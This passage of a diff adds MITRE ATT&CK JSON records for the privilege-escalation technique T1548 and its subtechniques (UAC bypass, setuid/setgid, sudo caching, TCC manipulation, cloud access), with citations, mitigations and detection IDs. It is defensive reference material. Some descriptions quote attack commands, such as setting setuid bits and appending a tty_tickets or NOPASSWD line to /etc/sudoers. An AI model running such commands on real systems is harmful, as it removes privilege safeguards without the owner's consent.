+                    "description": "Adversaries may circumvent mechanisms designed to control privilege elevation to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1548",
+                            "external_id": "T1548"
+                        },
+                        {
+                            "source_name": "TechNet How UAC Works",
+                            "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works"
+                        },
+                        {
+                            "source_name": "OSX Keydnap malware",
+                            "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.",
+                            "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"
+                        },
+                        {
+                            "source_name": "Fortinet Fareit",
+                            "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.",
+                            "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware"
+                        },
+                        {
+                            "source_name": "sudo man page 2018",
+                            "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.",
+                            "url": "https://www.sudo.ws/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows",
+                        "IaaS",
+                        "Office Suite",
+                        "Identity Provider"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.639000+00:00\", \"old_value\": \"2026-04-21 18:05:00.504000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1038: Execution Prevention",
+                            "M1047: Audit",
+                            "M1051: Update Software",
+                            "M1052: User Account Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0345: Detection Strategy for Abuse Elevation Control Mechanism (T1548)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 14:24:34.977000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Bypass User Account Control",
+                    "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1548/002",
+                            "external_id": "T1548.002"
+                        },
+                        {
+                            "source_name": "Davidson Windows",
+                            "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.",
+                            "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html"
+                        },
+                        {
+                            "source_name": "TechNet How UAC Works",
+                            "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works"
+                        },
+                        {
+                            "source_name": "SANS UAC Bypass",
+                            "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.",
+                            "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass"
+                        },
+                        {
+                            "source_name": "MSDN COM Elevation",
+                            "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.",
+                            "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx"
+                        },
+                        {
+                            "source_name": "enigma0x3 Fileless UAC Bypass",
+                            "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.",
+                            "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"
+                        },
+                        {
+                            "source_name": "TechNet Inside UAC",
+                            "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.",
+                            "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx"
+                        },
+                        {
+                            "source_name": "Fortinet Fareit",
+                            "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.",
+                            "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware"
+                        },
+                        {
+                            "source_name": "Github UACMe",
+                            "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.",
+                            "url": "https://github.com/hfiref0x/UACME"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Stefan Kanthak",
+                        "Casey Smith"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-15 19:51:31.419000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1047: Audit",
+                            "M1051: Update Software",
+                            "M1052: User Account Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0388: Detection Strategy for T1548.002 \u2013 Bypass User Account Control (UAC)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 14:40:20.187000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Elevated Execution with Prompt",
+                    "description": "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1548/004",
+                            "external_id": "T1548.004"
+                        },
+                        {
+                            "source_name": "AppleDocs AuthorizationExecuteWithPrivileges",
+                            "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.",
+                            "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg"
+                        },
+                        {
+                            "source_name": "Carbon Black Shlayer Feb 2019",
+                            "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.",
+                            "url": "https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html"
+                        },
+                        {
+                            "source_name": "Death by 1000 installers; it's all broken!",
+                            "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.",
+                            "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8"
+                        },
+                        {
+                            "source_name": "OSX Coldroot RAT",
+                            "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.",
+                            "url": "https://objective-see.com/blog/blog_0x2A.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jimmy Astle, @AstleJimmy, Carbon Black",
+                        "Erika Noerenberg, @gutterchurl, Carbon Black"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-15 19:51:53.527000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0395: macOS AuthorizationExecuteWithPrivileges Elevation Prompt Detection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 14:11:41.212000+00:00",
+                    "modified": "2026-05-12 15:12:00.639000+00:00",
+                    "name": "Setuid and Setgid",
+                    "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user\u2019s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user\u2019s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac Permissions](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1548/001",
+                            "external_id": "T1548.001"
+                        },
+                        {
+                            "source_name": "GTFOBins Suid",
+                            "description": "Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.",
+                            "url": "https://gtfobins.github.io/#+suid"
+                        },
+                        {
+                            "source_name": "OSX Keydnap malware",
+                            "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.",
+                            "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"
+                        },
+                        {
+                            "source_name": "setuid man page",
+                            "description": "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.",
+                            "url": "http://man7.org/linux/man-pages/man2/setuid.2.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.639000+00:00\", \"old_value\": \"2026-04-15 19:52:13.675000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0110: Setuid/Setgid Privilege Abuse Detection (Linux/macOS)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 14:34:44.992000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Sudo and Sudo Caching",
+                    "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \\'Defaults !tty_tickets\\' >> /etc/sudoers</code>.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1548/003",
+                            "external_id": "T1548.003"
+                        },
+                        {
+                            "source_name": "cybereason osx proton",
+                            "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.",
+                            "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does"
+                        },
+                        {
+                            "source_name": "OSX.Dok Malware",
+                            "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.",
+                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"
+                        },
+                        {
+                            "source_name": "sudo man page 2018",
+                            "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.",
+                            "url": "https://www.sudo.ws/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-15 19:52:35.310000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0052: Behavioral Detection Strategy for Abuse of Sudo and Sudo Caching"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-03-21 21:10:57.322000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "TCC Manipulation",
+                    "description": "Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).\n\nWhen an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)\n\nAdversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)\n\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1548/006",
+                            "external_id": "T1548.006"
+                        },
+                        {
+                            "source_name": "welivesecurity TCC",
+                            "description": "Marc-Etienne M.L\u00e9veill\u00e9. (2022, July 19). I see what you did there: A look at the CloudMensis macOS spyware. Retrieved March 21, 2024.",
+                            "url": "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/"
+                        },
+                        {
+                            "source_name": "TCC Database",
+                            "description": "Marina Liang. (2024, April 23). Return of the mac(OS): Transparency, Consent, and Control (TCC) Database Manipulation. Retrieved March 28, 2024.",
+                            "url": "https://web.archive.org/web/20240411112413/https://interpressecurity.com/resources/return-of-the-macos-tcc/"
+                        },
+                        {
+                            "source_name": "TCC macOS bypass",
+                            "description": "Phil Stokes. (2021, July 1). Bypassing macOS TCC User Privacy Protections By Accident and Design. Retrieved March 21, 2024.",
+                            "url": "https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Marina Liang",
+                        "Wojciech Regu\u0142a @_r3ggi",
+                        "Csaba Fitzl @theevilbit of Kandji"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 19:52:55.058000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1026: Privileged Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0534: TCC Database Manipulation via Launchctl and Unprotected SIP"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-07-10 16:37:15.672000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Temporary Elevated Cloud Access",
+                    "description": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1548/005",
+                            "external_id": "T1548.005"
+                        },
+                        {
+                            "source_name": "AWS PassRole",
+                            "description": "AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023.",
+                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html"
+                        },
+                        {
